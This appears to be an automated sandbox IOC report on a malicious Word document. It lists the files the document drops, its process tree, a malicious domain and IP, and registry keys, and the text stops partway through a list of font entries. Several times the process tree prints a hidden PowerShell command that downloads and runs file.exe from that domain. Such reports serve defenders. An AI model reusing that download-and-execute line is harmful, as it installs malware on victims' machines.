IOC Report
TEPO0015922.doc

loading gif

Files

File Path
Type
Category
Malicious
TEPO0015922.doc
Unicode text, UTF-8 text, with very long lines (4154), with CRLF line terminators
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
 malicious
C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
data
dropped
 malicious
C:\Users\user\AppData\Roaming\file.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3DD35DF4.wmf
Windows metafile
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A92D3FF.png
370 sysV pure executable
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CDF61019-DC02-4D7F-85CF-609F74BFDBD2}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D69C60B5-B29E-4F37-A352-937B9DD503EB}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FE1210DB-2D28-4E8A-A9AA-48F09BC90D1C}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\nsnC988.tmp\System.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\nss4AE7.tmp\System.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\TEPO0015922.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:59 2022, mtime=Tue Mar 8 15:45:59 2022, atime=Sat Mar 18 11:34:15 2023, length=248144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [doc]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0TIZ5KP0HTH2PPHMB9S2.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF501bcb.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF504a59.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9YQ9PYJ6KG059DAWKHEY.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YJUBHAZA5OF447Z3CQQ4.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\Trumpet1.wav
RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 Hz
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Belysningsvsenerne\Kuneste\Hebraized\Overtegningerne\PSReadLine.format.ps1xml
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\Boo.wav
RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 Hz
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\Cricks.Mou
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\License.rtf
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\Underlever.Als
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dll
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
dropped
C:\Users\user\Desktop\~$PO0015922.doc
data
dropped
There are 24 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
 malicious
C:\Users\user\AppData\Roaming\file.exe
C:\Users\user\AppData\Roaming\file.exe
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
malicious
C:\Users\user\AppData\Roaming\file.exe
C:\Users\user\AppData\Roaming\file.exe
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
 malicious
C:\Users\user\AppData\Roaming\file.exe
C:\Users\user\AppData\Roaming\file.exe
 malicious
C:\Windows\System32\notepad.exe
C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
 malicious
C:\Windows\System32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
httPs://thekaribacruisecompany.c
unknown
 malicious
httPs://thekaribacruisecompany.com/file.exe
unknown
 malicious
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://nsis.sf.net/NSIS_Error
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
httPs://thekaribacruisecompany.com/file.exePE
unknown
httPs://thekaribacruisecompany.com/file.exePEQ
unknown
http://www.piriform.com/ccleaner
unknown
https://thekaribacruisecompany.com/file.exe
149.102.154.62
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://thekaribacruisecompany.com
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
http://ocsp.entrust.net0D
unknown
http://www.piriform.com/Yg
unknown
https://secure.comodo.com/CPS0
unknown
http://crl.entrust.net/2048ca.crl0
unknown
There are 8 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
thekaribacruisecompany.com
149.102.154.62
 malicious

IPs

IP
Domain
Country
Malicious
149.102.154.62
thekaribacruisecompany.com
United States
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
p72
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2:2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
:;2
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-2000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
GraphicsFiltersPNGFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\73247
73247
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
